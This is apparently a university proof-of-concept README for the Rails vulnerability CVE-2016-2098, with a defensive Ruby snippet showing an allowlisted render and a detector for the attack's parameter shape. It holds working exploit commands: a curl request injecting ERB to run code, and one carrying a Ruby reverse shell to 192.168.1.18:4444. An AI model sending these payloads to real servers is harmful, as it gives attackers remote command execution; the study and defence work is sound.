# rails-PoC-CVE-2016-2098


A proof of concept for the vulnerability CVE-2016-2098.

University project created by @alejandro-marting where we can check the vulnerability CVE-2016-2098.

Using:

  • rails 4.2.5.1
  • the vulnerable code lives in the view app/views/poc/render1.html.erb

![](https://github.com/Alejandro-MartinG/rails-PoC-CVE-2016-2098/blob/master/app/assets/images/Captura%20de%20pantalla%20de%202017-01-15%2009:50:23.png)

## Execution

First, start the rails server with the following command:

$ rvmsudo rails server -b 0.0.0.0 -p 80

Now we can trigger the remote code execution with the following command (note that the curl requests below target port 3000 while the server command above binds port 80; adjust one of them so they match):

$ curl 'localhost:3000/poc/render1?template\[inline\]=<%25%3DFileUtils.touch+"rooted"%25>'

(A file named `rooted` should be created.)

If you want to try a reverse shell via Ruby code injection, run the following command:

$ curl -H "Content-type: application/json" -X GET -d ' {"template" : {"inline" : "<%= require \'socket\';exit if fork;c=TCPSocket.new(\"192.168.1.18\",\"4444\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end %>"}}'  http://localhost:3000/poc/render1
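The two requests above work because the application passes the request's `template` parameter straight into `render`, so a hash such as `{"inline" => "<%= ... %>"}` becomes `render(inline: ...)` and the ERB source is evaluated on the server. The following Ruby snippet is an added example, not code from this repository or from Rails: it models that vulnerable pattern next to a hardened version that only accepts a plain string naming an allowlisted template, plus a small detection helper that flags request parameters shaped like the PoC's payloads. The template names in `ALLOWED_TEMPLATES`, the function names, and the sample inputs are all assumptions made for the example.

```ruby
require 'set'
require 'json'

# Templates this controller is actually meant to render (assumed names for the example).
ALLOWED_TEMPLATES = Set.new(%w[poc/render1 poc/render2]).freeze

# Render-option keys that carry template *source* rather than a template *name*.
# Letting attacker-controlled values reach render under these keys is what
# turns CVE-2016-2098 into code execution.
SOURCE_RENDER_KEYS = %w[inline file].freeze

class UnsafeRenderOption < StandardError; end

# Vulnerable pattern (modelled here, not the PoC's own code): the request's
# "template" parameter is handed to render unchanged, so a Hash such as
# {"inline" => "<%= ... %>"} becomes render(inline: "<%= ... %>").
def vulnerable_render_options(params)
  params['template']
end

# Hardened pattern: accept only a String that names an allowlisted template,
# and always return a render-option Hash that we built ourselves.
def safe_render_options(params)
  tpl = params['template']
  raise UnsafeRenderOption, 'template must be a String' unless tpl.is_a?(String)
  raise UnsafeRenderOption, "template not allowed: #{tpl}" unless ALLOWED_TEMPLATES.include?(tpl)
  { template: tpl }
end

# Detection helper: true when the request carries a render-option Hash with a
# source-bearing key, which is the shape of both curl requests in this README.
def suspicious_render_params?(params)
  tpl = params['template']
  return false unless tpl.is_a?(Hash)
  tpl.keys.any? { |k| SOURCE_RENDER_KEYS.include?(k.to_s) }
end

# Constructed sample inputs: one benign request and one shaped like the PoC's
# JSON body (ERB source under template[inline]; the payload is a placeholder).
BENIGN_PARAMS    = { 'template' => 'poc/render1' }.freeze
MALICIOUS_BODY   = '{"template": {"inline": "<%= PAYLOAD_PLACEHOLDER %>"}}'
MALICIOUS_PARAMS = JSON.parse(MALICIOUS_BODY).freeze

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable passes through: #{vulnerable_render_options(MALICIOUS_PARAMS).inspect}"
  puts "suspicious?               #{suspicious_render_params?(MALICIOUS_PARAMS)}"
  puts "safe (benign):            #{safe_render_options(BENIGN_PARAMS).inspect}"
  begin
    safe_render_options(MALICIOUS_PARAMS)
  rescue UnsafeRenderOption => e
    puts "safe rejected:            #{e.message}"
  end
end
```

The point of `safe_render_options` is that the request can only choose among names the developer already decided to expose; everything else, including any Hash, is rejected before `render` is reached. `suspicious_render_params?` is the kind of check a WAF rule or request log scanner can apply to spot the `template[inline]` / `template[file]` shape used by this PoC.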

If you have any questions, please contact me!